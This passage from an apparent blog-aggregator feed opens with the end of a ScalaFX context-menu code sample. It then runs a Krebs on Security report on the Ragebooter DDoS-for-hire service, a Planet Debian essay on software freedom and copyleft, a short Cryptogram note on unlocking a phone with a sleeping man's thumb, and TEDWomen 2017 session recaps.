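  val table = new TreeTableView[Pkg](rootItem) {
    columns ++= List(
      new TreeTableColumn[Pkg, String] {
        text = "Package"
        cellValueFactory = { _.value.value.value.name }
      },
      new TreeTableColumn[Pkg, String] {
        text = "Status"
        // Snapshot of the flag at cell-creation time; good enough for this demo.
        cellValueFactory = { c =>
          StringProperty(if (c.value.value.value.installed.value) "installed" else "not installed")
        }
      }
    )
  }

  table.rowFactory = { _ =>
    new TreeTableRow[Pkg] {
      val installMI = new MenuItem("Install")
      val removeMI = new MenuItem("Remove")
      contextMenu = new ContextMenu(installMI, removeMI)

      // Recompute the menu state from the package currently shown in this row.
      def refresh(p: Pkg): Unit = {
        installMI.disable = p.installed.value
        removeMI.disable = !p.installed.value
      }

      // Actions read item.value at click time, never a package captured when the row was built.
      installMI.onAction = handle {
        Option(item.value).foreach { p => p.installed.value = true; refresh(p) }
      }
      removeMI.onAction = handle {
        Option(item.value).foreach { p => p.installed.value = false; refresh(p) }
      }

      // The row is reused as the user scrolls: only its item changes, so this is the
      // place to update the menu. The item is null while the row is empty.
      item.onChange { (_, _, newPkg) =>
        if (newPkg != null) refresh(newPkg)
      }
    }
  }

  stage = new JFXApp.PrimaryStage {
    title = "Context menu follows the displayed item"
    scene = new Scene(table, 420, 320)
  }
}
```

Scroll the table and right-click rows to see that Install is disabled for every third package and Remove for the others, regardless of which row instance happens to display them.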

Krebs on SecurityDDoS-for-Hire Service Launches Mobile App

In May 2013 KrebsOnSecurity wrote about Ragebooter, a service that paying customers can use to launch powerful distributed denial-of-service (DDoS) attacks capable of knocking individuals and Web sites offline. The owner of Ragebooter subsequently was convicted in 2016 of possessing child pornography, but his business somehow lived on while he was in prison. Now just weeks after Poland made probation, a mobile version of the attack-for-hire service has gone up for sale on the Google Play store.

In the story Ragebooter: ‘Legit’ DDoS Service, or Fed Backdoor, I profiled then 19-year-old Justin D. Poland from Memphis — who admitted to installing code on his Ragebooter service that allowed FBI investigators to snoop on his customers.

Last February, Poland was convicted of one felony count of possession of child pornography, after investigators reportedly found 2,600 child pornography images on one of his computers. Before his trial was over, Poland skipped town but his bondsman later located him at his mother’s house. He was sentenced to two years in jail.

Poland did not respond to multiple requests for comment, but on his Facebook account Poland said the images belonged to his former roommate — David Starliper — who’d allegedly used Poland’s computer. Starliper also was convicted of possessing child pornography and sentenced to two years in prison.

In September 2017, Poland began posting on his Facebook account that he had made parole and was getting ready to be released from prison. On Oct. 6, the first version of the Android edition of Ragebooter was put on sale at Google’s Play Store.

The mobile version of Ragebooter.

Poland’s Facebook page says he is the owner of ragebooter[dot]com, ragebooter[dot]net, and another site called vmdeploy[dot]net. The advertisement for Ragebooter’s new mobile app on Google Play says the developer’s email address is contact@rageservices[dot]net. The registration details for rageservices[dot]net are hidden, but the Web site lists some useful contact details.

One of them is a phone number registered in Memphis — 901-219-3644 — that is tied to a Facebook account for an Alex Slovak in Memphis. The other domain Poland mentions on his Facebook page — vmdeploy[dot]net — was registered to an Alex Czech from Memphis. It seems likely that Alex has been running Ragebooter while Poland was in prison. Mr. Slovak/Czech did not respond to requests for comment, but it is clear from his Facebook page that he is friends with Poland’s family.

Rageservices[dot]net advertises itself as a store for custom programming and Web site development. Its content is identical to a site called QuantumServices. A small purchase through the rageservices[dot]net site for a simple program generated a response from Quantum Services and an email from quantumservicesweb@gmail.com. The person responding at that email address declined to give his or her name, but said they were not Justin Poland.

Figures posted to the home page of ragebooter[dot]net claim the service has been used to conduct more than 310,000 DDoS attacks. Memberships are sold in packages ranging from $3 per day to $300 a year for an “enterprise” plan. Ragebooter[dot]net includes a notice at the top of the site indicating that rageservices[dot]net is indeed affiliated with Ragebooter.

If Poland still is running Ragebooter, he may well be violating the terms of his parole. According to the FBI, the use of DDoS-for-hire services like Ragebooter is illegal.

In October the FBI released an advisory warning that the use of booter services — also called “stressers” — is punishable under the Computer Fraud and Abuse Act, and may result in arrest and criminal prosecution.

“Booter and stresser services are a form of DDoS-for-hire — advertised in forum communications and available on Dark Web marketplaces — offering malicious actors the ability to anonymously attack any Internet-connected target. These services are obtained through a monetary transaction, usually in the form of online payment services and virtual currency. Criminal actors running booter and stresser services sell access to DDoS botnets, a network of malware-infected computers exploited to make a victim server or network resource unavailable by overloading the device with massive amounts of fake or illegitimate traffic.”

Planet DebianThadeu Lima de Souza Cascardo: Software Freedom Strategy with Community Projects

It's been some time since I last wrote. Life and work have been busy. At the same time, the world has been busy, and as I would love to write a larger post, I will try to be short here. I would love to touch on the Librem 5 and postmarketOS. In fact, I had, in a podcast in Portuguese, Papo Livre. Maybe, I'll touch a little on the latter.

Some of the inspiration for this post include:

All of those led me to understand how software freedom is under attack, in particular how copyleft is under attack. And, as I talked during FISL, though many might say that "Open Source has won", end users' software freedom has not. Lots of companies have co-opted "free software" but give no software freedom to their users. They seem friends with free software, and they are. Because they want software to be free. But freedom should not be a value for software itself, it needs to be a value for people, not only companies or people who are labeled software developers, but all people.

That's why I want to stop talking about free software, and talk more about software freedom. Because I believe the latter is more clear about what we are talking about. I don't mind that we use whatever label, as long as we establish its meaning during conversations, and set the tone to distinguish them. The thing is: free software does not software freedom make. Not by itself. As Bradley Kuhn puts it: it's not magic pixie dust.

Those who have known me for years might remember me as a person who studied free software licenses and how I valued copyleft, the GPL specifically, and how I concerned myself with topics like license compatibility and other licensing matters.

Others might remember me as a person who valued a lot about upstreaming code. Not carrying changes to software openly developed that you had not made an effort to put upstream.

I can't say I was wrong on both accounts. I still believe in those things. I still believe in the importance of copyleft and the GPL. I still value sharing your code in the commons by going upstream. But I was certainly wrong in valuing them too much. Or not giving as much or even more value to distribution efforts of getting software freedom to the users.

And it took me a while in seeing how many people also saw the GPL as a tool to get code upstream. You see that a lot in Linus' discourse about the GPL. And that is on the minds of a lot of people, who I have seen argue that copyleft is not necessary for companies to contribute code back. But that's the problem. The point is not about getting code upstream. But about assuring people have the freedom to run a modified version of the software they received on their computers. It turns out that many examples of companies who had contributed code upstream, have not delivered that freedom to their end-users, who had received a modified version of that same software, which is not free.

Bradley Kuhn also alerts us that many companies have been replacing copyleft software with non-copyleft software. And I completely agree with him that we should be writing more copyleft software that we hold copyright for, so we can enforce it. But looking at what has been happening recently in the Linux community about enforcement, even though I still believe in enforcement as a strategy, I think we need much more than that.

And one of those strategies is delivering more free software that users may be able to install on their own computers. It's building those replacements for software that people have been using for any reason. Be it the OS they get when they buy a device, or the application they use for communication. It's not like the community is not doing it, it's just that we need to acknowledge that this is a necessary strategy to guarantee software freedom. That distribution of software that users may easily install on their computers is as much or even more valuable than developing software closer to the hacker/developer community. That doing downstream changes to free software in the effort of getting them to users is worth it. That maintaining that software stable and secure for users is a very important task.

I may be biased when talking about that, as I have been shifting from doing upstream work to downstream work and both in recent years. But maybe that's what I needed to realize that upstreaming does not necessarily guarantee that users will get software freedom.

I believe we need to talk more about that. I have seen many people dear to me disregard that difference between the freedom of the user and the freedom of software. There is much more to talk about that, go into detail about some of those points, and I think we need to debate more. I am subscribed to the libreplanet-discuss mailing list. Come join us in discussing about software freedom there, if you want to comment on anything I brought up here.

As I promised I would, I would like to mention postmarketOS, which is an option users have now to get some software freedom on some mobile devices. It's an effort I wanted to build myself, and I applaud the community that has developed around it and has been moving forward so quickly. And it's a good example of a balance between upstream and downstream code that gets to deliver a better level of software freedom to users than the vendor ever would.

I wanted to write about many of the topics I brought up today, but postponed that for some time. I was motivated by recent events in the community, and I am really disappointed at some of the free software players and some of the events that happened in the last few years. That got me into thinking about how we need to manifest ourselves about those issues, so people know how we feel. So here it is: I am disappointed at how the Linux Foundation handled the situation about Software Freedom Conservancy taking a case against VMWare; I am disappointed about how Software Freedom Law Center handled a trademark issue against the Software Freedom Conservancy; and I really appreciate all the work the Software Freedom Conservancy has been doing. I have supported them for the last two years, and I urge you to become a supporter too.

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 6

This week our youngest students are starting work on their Class Play, slightly older students are choosing a family group from around the world for a role play activity and our oldest students are holding a Class Election! What an activity-filled week! Foundation/Prep/Kindy to Year 3 Our youngest students in standalone Foundation/Prep/Kindy classes (Unit F.4) […]


CryptogramHacking a Fingerprint Biometric

Embedded in this story about infidelity and a mid-flight altercation, there's an interesting security tidbit:

The woman had unlocked her husband's phone using his thumb impression when he was sleeping...

TEDFearless risk-taking: Notes from Session 4 of TEDWomen 2017: Suspend

Jacqueline Novogratz hosts this session of TEDWomen 2017 — about the risks we take to create the world we want. Photo: Stacie McChesney / TED

The suspension bridge, says Acumen founder and session host Jacqueline Novogratz, provides the perfect metaphor for the leadership we need to see in this “fractured, divided, too often cynical world.” Why? Because its structure balances a strong, deep, unwavering foundation with its ability to stretch across vast distances to connect and bring close. That’s precisely what we need to see in today’s moral leaders, says Novogratz. And that’s what we’re set to hear in this TEDWomen session, “Suspend.”

Shameem Akhtar is an education activist in her home of Pakistan, where she advocates for the education of women and girls. She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

To learn is to be free. Shameem Akhtar lived as a boy for most of her childhood, due to her uncle’s savvy thinking around the oppressive restrictions often placed on girls in their native Pakistani culture. She experienced the privileges and freedoms of being a boy — playing outside and, most important, going to school. An immutable passion was lit to study and learn, and be free, and she fought both to attend university and to take a job, in a culture where most women are expected to stay home. And then a funny thing happened; people noticed she was sending money home. “Over time, other parents begin sending their daughters to school,” she says. “Today, not a single girl from my village is out of school.” Change is slow and there is still much work to be done, but Akhtar is now a passionate advocate for girls’ rights and education. “The road is not easy, the destination is not close, but I have dreams in my eyes and I am not going to look back now,” she concludes, to great applause from an appreciative audience. (Note: this is Akhtar’s first visit to the United States. She arrived in New Orleans on Halloween. Talk about culture shock.)

Lera Boroditsky studies how our language habits shape how we think and see the world, sharing amazing examples from many cultures. She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash

Does language shape how we think? Globally, there are about 7,000 languages spoken, all with different sounds, vocabularies and structures. “It begs the question, does the language we speak shape the way we think?” asks cognitive scientist Lera Boroditsky. It’s a long-standing (like, thousands of years), ongoing debate, but Boroditsky shares five examples from new research suggesting that the answer is … yes. For example, the Pormpuraaw, an Aboriginal tribe in Australia, use cardinal directions instead of words like left or right, helping them to stay better oriented than we used to think humans ever could be. “The beauty of linguistic diversity is that it reveals to us just how ingenious and how flexible the human mind is,” says Boroditsky. “Human minds have invented not one cognitive universe, but 7,000.”

Turning prison into a bridge to a better life. Six years ago, Teresa Njoroge was convicted of a financial crime — the end of a long string of false accusations against her, increasing attempts to bribe her, and a corrupt justice system in her home in Kenya. As the gates of Langata Women Maximum Prison closed behind her, she knew she was in for the toughest year of her life. But what she did not expect, she says, was the women, and their stories, she encountered there. “I realized,” she said, “that it wasn’t crime that put these women in prison. Far from it. It begun with lack of education, whose supply and quality is not equal for all, and a lack of economic opportunities, which pushes them to petty survival crimes.” Once she got out, she co-founded Clean Start, an organization that helps women and men of Kenya reconnect with life and opportunities after serving prison time. “We cheer them on,” she says, and “we never lose sight of who they are: men and women full of unleashed potential.”

“You Found Me.” Cellist and chanteuse Helen Gillet mixes her classical training, New Orleans-based jazz roots and free improvisational skills to perform her own eclectic musical fusion. Her powerful and innovative performance provides a dreamy, melodious change of pace for the audience.

Dixon Chibanda speaks from a Friendship Bench — a community-based mental health tool that brings care to thousands of people in Zimbabwe. Photo: Ryan Lash / TED

Granny power. Dixon Chibanda used to be a rock star, but he’s here to share thoughts and insights as one of Zimbabwe’s 12 psychiatrists. That’s right. 12 — for a population of some 14 million. Realizing, sadly, that the country would never be able to scale traditional methods to treat those with mental health issues, Chibanda helped to develop a beautiful solution powered by a limitless resource. In 2006, he launched friendship benches, (wo)manned by grandmothers who are trained in evidence-based talk therapy (and themselves supported via their mobile phones). People who want to talk, are directed to seek their first line of treatment at a local bench. It’s so simple — and it works. “Today, hundreds of highly competent grandmothers who understand the basics of cognitive behavior therapy are working in over 70 communities across the country,” says Chibanda: More than 30,000 people received treatment at a friendship bench in Zimbabwe last year. Extraordinary.

Let’s talk shit (to solve our sanitation problems). Lindsay Stradley says our collective squeamishness at talking about waste is causing huge problems. For instance, not having an adult word for “poop” greatly diminishes our ability to talk responsibly or effectively about sewage and waste systems. She outlines how her Nairobi-based organization, Sanergy, uses an economic sanitation solution model that puts money back into the pockets of the citizens, dignity back into the hearts of those living in areas with poor sanitation and a lack of clean, safe toilets — and takes waste out of communities for the greater good.

Steph Speirs is a solar entrepreneur whose own story upends the stereotypes about business leaders. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED

Entrepreneurship that chips away at inequality. “My mom taught us that the American Dream wasn’t about the acquisition of stuff,” says solar entrepreneur Steph Speirs. “The American Dream was about choice, the choice to choose what you want to do — and with that choice comes dignity.” Many of the world’s most intractable problems, however, come down to a lack of choice. Consider energy. “Most people don’t think clean energy is an option,” she says, but the reality is that the cost of solar is lower than it’s ever been and could save people money if they could just access it. “The people who need energy savings the most, low-income renters like my mom, they’re going to be the least likely to get it right now,” she says. Through her company Solstice, Speirs and her colleagues are trying to get solar power to every American. “We can use our knowledge, our words and our time to chip away at inequality,” she says.

What’s your Ironman? Born in Bombay, Minda Dentler contracted polio before her first birthday, paralyzing her from the hips down. Adopted by an American family, she moved to Spokane, Washington, where she received medical treatment to walk with braces — and to learn she could do almost anything she could set her mind to. Which might be why, as an adult, she decided to compete in the Ironman triathlon in Kona, Hawaii: a 2.4-mile swim, a 112-mile bike ride, followed up with a full 26.2-mile marathon. Her first attempt was technically a failure … and a year later, she came back and completed the race. “For the first time in its 35-year history, a female wheelchair athlete completed the Ironman World Championship. It wasn’t just any female athlete; it was me, a paralyzed orphan from India,” she says. Having conquered both Kona and polio, she now has a new Ironman ahead: attempting to eradicate the disease that paralyzed her.

Minda Dentler conquered the legendary Ironman triathlon in Kona, Hawaii — and now she’s set to conquer polio. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED


TEDThe power of showing up: Notes from Session 1 of TEDWomen 2017: Build

Vocalist Deborah Cox and the Lake Area Girls Choir blow the roof off to kick-start TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans. Photo: Stacie McChesney / TED

“We build them, we cross them, sometimes we burn them.” TED Content Director Kelly Stoetzel kicks off TEDWomen 2017 with an explanation of how she and conference curator Pat Mitchell developed this year’s rich conference theme, Bridges. “Over the next three days we’ll hear talks from artists and architects, entrepreneurs, scientists and activists,” she continues — the usual TED fare, in other words, given a special TEDWomen twist. In this session, “Build,” we find ideas of power, empathy, ingenuity and radical humanity, to name a few. So let’s get cracking.

Hosts Pat Mitchell and Kelly Stoetzel kick off TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

I’m every woman. This fall, the powerhouse vocalist Deborah Cox is starring in the national tour of The Bodyguard, a musical based on a movie starring the late great Whitney Houston, who sings a song first popularized by the great Chaka Khan that was co-written by the songwriting legend Valerie Simpson (of Ashford & Simpson)  … That chain of strong women’s voices just got 50 voices stronger, as Cox opens with a stunning take on “I’m Every Woman,” joined by the young women of the Lake Area Girls Choir. Their combined voices rock the audience right out of their seats, echoing up through the balconies of the historic Orpheum Theater.

Be the first domino. Self-proclaimed professional troublemaker Luvvie Ajayi tamed her fears by conquering them in the boldest ways possible — deep-sea diving, skydiving and ziplining across forests. In this, the first full talk of the conference, she encourages others to do the same, to be the first domino causing a chain reaction. “Being the first domino is doing or saying what is difficult, because that is usually when it’s needed,” she says. However, she adds, we can’t simply rely on those who have traditionally spoken up and out to ignite social change. Instead, she calls for us all to fearlessly embrace who we are as a revolutionary act, to become fellow troublemakers and speak truth to power despite trepidation.

Why did Luvvie Ajayi jump out of a “perfectly good plane,” she asks? To face her fear in the boldest way possible. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Footbridges that connect people with opportunity. Avery Louise Bang found her calling when she traveled in Fiji as a college student and saw communities mired in isolation because of the rivers, canyons or peaks separating them from the rest of the world. Without an easy way to cross these expanses, people struggled to send their kids to school or reach medical care. Bang resolved to help, and studied engineering before joining the Denver-based nonprofit Bridges to Prosperity, which has now built 270 bridges in more than 20 countries, connecting nearly a million people. But their work, she emphasizes, is less about constructing spans of steel, stone and mortar and more about transforming lives by giving them access to a larger world. She calls on countries and philanthropists to prioritize connecting the estimated one billion people on the planet still stranded due to geography. As she says: “Poverty due to rural isolation is a crisis we can solve in our lifetime.”

Avery Bang builds bridges — literal ones, that link isolated villages to schools, health care and markets. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Justice has geography too. Liz Ogbu is a trained architect, but she likes to say she works in spatial justice. What’s that, you ask? Well, she says, it’s a way to remember that all too often justice is impacted by geography. That’s right, she’s talking about gentrification — from the perspective of those displaced by it, not those looking to “fix” it. Ogbu questions the troubling assumption that some people (traditionally the poor or disenfranchised) will inevitably be pushed out when development and progress come knocking. “Why is it we treat culture erasure and economic displacement as inevitable?” she asks feistily. Instead, developers, architects, designers and policy makers must think differently about development, to “make a commitment to build people’s capacity to stay … to stay in their homes, to stay in their communities, to stay where they feel whole.”

Can we heal the Gulf of Mexico? Tonight, ocean expert Nancy Rabalais is speaking onstage; by Friday she’ll be back at work, diving the Gulf of Mexico to track the ominously named Dead Zone — a zone without enough oxygen in the water to support life. The Gulf has the second largest Dead Zone in the world, the size of New Jersey (“not to brag,” says Nancy), and on top of killing fish and crustaceans, it’s killing the traditional fisheries in these waters. Here’s the troubling reality: the Dead Zone is caused mainly by excessive nitrogen and phosphorus, the Mississippi-borne runoff of corn and soybean farms hundreds of miles upstream. How to help US Midwestern farmers care about shrimp fisheries in the Gulf? By speaking out and showing the connection between algae-poisoned water in Toledo, Ohio and the dying life on the bottom of the Gulf. Nancy is working to build across-the-aisle support for cleaning up the Gulf’s waters and restoring one of America’s treasures.

When Nancy Rabalais dives in the Gulf of Mexico, she sees the “dead zone” effects of farm techniques far upstream. She speaks at TEDWomen 2017: Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Justice is our responsibility. The United States incarcerates more people than any other country in the world, says Eve Abrams, producer of Unprisoned, a podcast about the prison system. However, between one and four percent of those in prison are likely innocent. That’s 87,000 brothers, sisters, mothers, and fathers — predominantly African American — unnecessarily separated from their families, their lives and dreams put on hold. Using audio footage from her interviews, Abrams shares the touching stories of those with incarcerated family members, and calls for us all to take a stand to ensure that the justice system ultimately works for everyone. “Justice is hard to come by,” she says. “If we don’t like what’s going on, it’s up to us to change it.”

Helping every mother have a healthy birth. Christy Turlington Burns remembers the moment her just-born daughter was placed in her arms for the first time, a magical moment that was quickly shattered when her third stage of labor (when the placenta expels) did not go as planned. Surrounded by the best medical care, she lost almost a quart of blood as doctors and nurses worked to resolve her condition. She’s fine now — in fact, she was home with her baby within 24 hours. But as she found out, what happened to her is one of the leading causes of maternal death in the world. Burns resolved to help. Her nonprofit, Every Mother Counts, targets maternal health in a number of straightforward, practical ways. None of this is a mystery — we know how to help moms survive childbirth, and most of the interventions are low-cost and proven. Now we must find the will to do them, for every mother in the world.

Where to begin. Artist and poet Cleo Wade recites a moving poem about being an advocate for love and acceptance in a time when both seem in short supply. Interwoven with stories of individuals at the beginning or end of their lives, she shares the inherent truths that come with aging and reflects in the wisdom of a life well-lived. Wade leaves the stage with a simple yet enduring takeaway: be good to yourself, be good to others, be good to the Earth. “The world will say to you / ‘Be a better person’/ Don’t be afraid to say yes,” she says.

That’s it from TEDWomen for tonight. Up tomorrow, a whole host of more extraordinary stories and insightful ideas. Stay tuned, and good night from New Orleans.


TEDThe power of partnership: Notes from Session 3 of TEDWomen … Connect

Life partners Chris Waddell and Jean Oelwang are hosts of Session 3, an exploration of partnerships. They kick off the session at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

Our hosts for this session, Jean Oelwang and Chris Waddell, are life partners who’ve both had to overcome their inclination to be a solo superhero — to be the best at business, school, sports. Jean spent her career climbing the corporate ladder, being tough, making her way to the top alone. Meanwhile, Chris was a skier who, early in his own career, faced what could be a devastating setback when his ski popped off during a turn, leaving him paralyzed from the waist down. He went on to become a world-champion monoskier, setting Paralympic history. He kicks off this session with his story of a quest to summit Mt. Kilimanjaro solo on his handcycle. On the way, he found that, maybe, going solo wasn’t the real goal at all. Building from this story, Session 3 unfolds …

Historian of photography Deborah Willis and artist Hank Willis Thomas, sometime collaborators, always mother and son, speak about their intertwined work and lives at TEDWomen 2017. Photo: Stacie McChesney / TED

Love overrules: Deborah Willis and Hank Willis Thomas are photographers. They are also mother and son. Deborah, told by her photography professor that she was intended for motherhood and not the art world, responded by giving birth to Hank, working the pregnancy into her pictures, and launching into a storied career as a photographer, curator and writer. Growing up in a house full of pictures, Hank also picked up a camera early in life. Their subsequent work has always drawn from what they characterize as a symbiotic relationship defined by abiding love. “Through her actions,” Hank says of his mother, “she has shown me that love is an action, not a feeling … a way of listening and a way of seeing.” Love, as it relates to family, community, race, identity, notions of truth, has remained a throughline that pierces their efforts to highlight stories that diverge from mainstream narratives about black life. Pondering the reason behind her decision to make photography and love the twin foundations of her professional life, Deborah comes to a conclusion: “Because of the lack of images that circulate in the public about black love and black joy.” Watching this duo onstage provides both.

A textbook for racial literacy. Growing up, Winona Guo and Priya Vulchi thought they understood racism. “We had experienced and heard stories about race, about prejudice, discrimination and stereotyping, and we were like, ‘we get it, racism!’” says Vulchi. “But we weren’t even close,” says Guo. The two friends, then seniors in high school, decided they needed to learn more — so they took a trip to collect hundreds of personal stories about race. Using those stories, Guo and Vulchi highlight the two fundamental gaps they discovered in our racial literacy: the heart gap and the mind gap. One, an inability to understand each of our experiences and be compassionate beyond lip service, and the other, an inability to understand the larger systemic ways racism operates. To bridge those gaps, Guo and Vulchi co-created a textbook, The Classroom Index, that pairs personal stories with statistics. “We need to raise the bar, elevate our standards for racial literacy, because without investing in an education that values both the story and the statistic, the people and the numbers, the interpersonal and the systemic, there will always be a piece missing,” they say.

The summer they finished high school, Priya Vulchi and Winona Guo hit the road to explore American attitudes toward racism — and wrote a textbook to help young people like them understand what it really means right now. They speak together at TEDWomen 2017. Photo: Stacie McChesney / TED

The defining moments of our lives. On one awful night, Ples Felix’s grandson, a young teenager, murdered Azim Khamisa’s son, a college student, in a robbery gone wrong, fueled by drugs, alcohol and a false sense of belonging. The deadly encounter of these two young men sent Khamisa and Felix down paths of deep meditation to forgive and to be forgiven — and in act of bravery and reconciliation, the two men met and forged a lasting bond. “Sometimes in deep trauma and deep tragedy, there is a spark,” says Khamisa, in meeting Felix’s grandson, Tony, and connecting with the humanity and humility he witnessed. Together, Khamisa and Felix have used their story as an outline for a better, more merciful society where victims of tragedy can grow with one another and heal — highlighted by the heartfelt news they shared on the TEDWomen stage. As a testament to their enduring relationship and combined efforts to spread the message of peace over the last 12 years, Tony will be released from prison. “Peace is possible,” says Khamisa. “How do I know that? Because I am at peace.”

Sisterhood in three scenes. Felice Belle and Jennifer Murphy, two self-proclaimed sisters in heart and thought, took the TEDWomen stage in a captivating, poetic journey through their friendship. Lives lived apart and together, woven with laughter and dancing between tragedy and delight, Belle and Murphy lovingly recalled memories and moments that solidified their sisterhood from the day they first became sisters to now. “There are moments that bond,” says Belle. “When there is no train, no car service, no bus, my sister will walk miles just to be by my side.” Together, they recite. “When a sister loves a sister, you listen to her read, thinking: as heaven to the gods is poetry to the beloved.”

Erotic wisdom from the African continent. From our fear of women’s bodies to our sheepishness around the word ‘nipple,’ our ideas about sex need an upgrade, say sex educators (and hilarious women) Tiffany Mugo and Siphumeze Khundayi. For a radical new take on sex positivity, the duo took to the TED stage to suggest we look no further than the African continent for erotic wisdom both ancient and modern. For instance, before colonization, certain African societies had sexuality schools that taught social and erotic cues; some even maintained spaces where teenagers could explore their sexual urges and how to handle them. The pair also introduces us to an early Yoruba concept known as Osunality, which affirms the normality of sexual pleasure and the erotic, and which teaches women to brandish their sexuality unselfconsciously. Even in the present tense, say Siphumeze and Tiffany, queer African women who practice kink show us how we can shake off the problematic ideas about sex we’ve internalized, and redefine sex and pleasure on our own terms.

Tiffany Mugo and Siphumeze Khundayi speak to the joy (and occasional comedy) of sex — and ask us to look at some ancient African practices that might help us all get a little better at it. They speak together  at TEDWomen 2017. Photo: Stacie McChesney / TED

The dynamic duo intent on bursting our filter bubbles and bringing us together. Although it sounds like the plot of a rom-com — Republican guy meets liberal woman; sparks fly! — John Gable and Joan Blades have formed a very real friendship that is fostering meaningful exchanges between people from different parties, groups and backgrounds. Gable, who calls himself “a product of small town America, conservative at its heart,” worked in Republican politics before entering the tech world. Alarmed by the filter-bubble phenomenon, he founded AllSides.com, which uses technology to present issues from multiple angles. A Berkeley, California, native and progressive, Blades (who co-founded Moveon.org in 1998) is the co-founder of LivingRoomConversations.org, which organizes people to hold small gatherings in their homes to speak to those holding alternate viewpoints. The goal is understanding. “It’s a deep listening practice,” Blades says, “never a debate.” A few years ago, Gable and Blades created AllSidesforSchools.org, which pairs students with their counterparts in other parts of the country and the world. It’s been used in 42 states so far, and after participating, “92 percent of students say they better understood the other student’s side,” reports Gable. Humans have thrived thanks to our ability to collaborate to solve problems. Gable and Blades remind us that as we face our most intractable challenges yet — climate change, poverty, chronic disease — we will only succeed if we listen and learn from each other.

Joan Blades is a lefty; John Gable is … not. But they’re friends, and they can have a conversation about what really matters to them. They speak together at TEDWomen 2017. Photo: Ryan Lash / TED

The power behind the partnership. Our hosts Jean and Chris come back to close the session — and to expand on an idea teased in Jean’s short intro: that partnerships are more powerful than we know. In her work with The Elders, a group of veteran, venerated leaders who advise on world events, she noticed that the great figures she was working with all seemed to have a trusted partner who was that magical combination of supportive and honest. Exploring the relationships of folks like Jimmy and Rosalynn Carter, or Desmond and Leah Tutu, she unpacks the qualities that make a great and productive partnership — which she’s exploring in a new project called Plus Wonder.

In her work with The Elders, pictured behind her, Jean Oelwang became fascinated by how many great people were paired up with an equally great partner — a friend, a spouse, someone who gave them honest answers and helped them be their best. She speaks at TEDWomen 2017. Photo: Ryan Lash / TED


TEDBe fierce, claim power: Notes from Session 5 of TEDWomen: Burn

Singer/songwriter Judith Hill performs “Strange Fruit” to begin Session 5 of TEDWomen 2017, a hard look at hard things. Photo: Stacie McChesney / TED

There’s a theme of Bridges that plays through this conference — and one of the things we sometimes need to do with bridges is burn them, to move forward with no option of going backward in time or space. In this session, hosted by documentary film aficionado Jess Search, we listen to hard truths about taking the steps we need to take — without looking back.

In her day job, Jess Search supports documentary filmmakers as head of the Doc Society. She brings that same curious eye to her job this week: hosting Thursday evening’s session of TEDWomen 2017. Photo: Ryan Lash / TED

A strange and bitter crop. The session begins with Judith Hill’s richly textured performance of “Strange Fruit,” a protest song made famous by Billie Holiday. Contrasting traditional Deep South imagery of magnolia blossoms and gentle breezes with the brutal legacy of lynching, the lyrics drive home the still-unexamined history of racial terrorism in the 20th-century American South: “Southern trees bear strange fruit / Blood on the leaves and blood at the root / Black bodies swinging in the southern breeze / Strange fruit hanging from the poplar trees.”

When Gretchen Carlson reported her own sexual harassment at work, it sparked an outpouring of thousands of women’s stories — and inspired her to speak up even more to create safer places to work. She speaks at TEDWomen 2017 in New Orleans. Photo: Stacie McChesney / TED

We have to be fierce. Gretchen Carlson is a veteran TV journalist and host who won the title of Miss America in the late ’80s, representing her home state with a smile and a plan to land a dream job in media. But again and again in her year wearing the crown, this young woman encountered men who pushed unwanted sexual advances on her: the TV executive who stuck his tongue down her throat; the LA publicist who grabbed her by the neck in a car backseat. “Only recently did I realize these incidents weren’t just harassment – they were assault,” she says now. “But like so many survivors, I thought: ‘I’ve got this. I’m okay. Just move on, Gretchen.'” Fast-forward to 2016, when her story of workplace harassment at Fox News broke. It was one of the scariest days of her life — but it also brought an outpouring of women’s stories, a flood of honesty that inspired her to do more and has led to her new book. Onstage, she lays out three things we can all do to create safer places to work — from acting as allies to fighting against binding arbitration clauses in workplace contracts. Because here’s the breaking news, “the untold, shocking truth about women and sexual harassment: Women want to work in a safe, welcoming and harassment-free environment,” she says. A pause. “That’s it.”

Tribal attorney Tara Houska holds a piece of her cultural history — a rattle used in sacred ceremonies — while talking about the kids in the slide behind her, the Native American kids who are one of the fastest-growing new demographics in the US. Can we make life better for these kids? She speaks at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We are resilient. We are fierce. We are still here. “When you aren’t viewed as real people, it’s a lot easier to run over your rights,” says tribal attorney Tara Houska. As part of the bear clan from Couchiching First Nation in International Falls, Minnesota, she’s watched and experienced countless attempts to eradicate the legitimacy of her land, her people and her culture — the most recent instance being the months-long standoff at Standing Rock that resonated and rallied thousands around the world. Through systemic ignorance, violence, genocide and disregard of treaty agreements — often by governments themselves — native peoples are constantly fighting an uphill battle for fundamental rights. So let’s start addressing that ignorance, Houska suggests. Currently, there are 567 federally recognized tribes in the US alone, yet only half of all US schools mention more than a single tribe in textbooks. Education is fundamental, she says: “Change the narrative and grow. Empathize. Support. Remember we are as human beings living on this earth together.”

Mwende “FreeQuency” Katwiwa blends a poem about reproductive justice with a thoughtful discussion of Black Lives Matter — because, as she says, it is impossible to separate the two issues. She speaks at TEDWomen 2017. Photo: Ryan Lash / TED

